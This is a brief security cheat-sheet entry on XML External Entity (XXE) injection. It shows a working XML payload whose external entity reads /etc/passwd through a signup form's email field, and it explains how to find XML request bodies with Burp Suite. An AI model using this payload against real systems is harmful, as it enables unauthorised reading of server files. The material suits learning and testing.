XXE - security

XML Injection Example Using ENTITY

<?xml version="1.0"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
    <name>aa</name>
    <tel>aa</tel>
    <email>&xxe;</email>
    <password>aa</password>
</root>
        

Discovering XML Vulnerability

By inspecting (in burp-suite, or others) something like a signup form,
or other post forms, we can potentially find that XML is being sent
as the payload. If it returns something, we can instead use an ENTITY
variable to instead return the contents of a file on the filesystem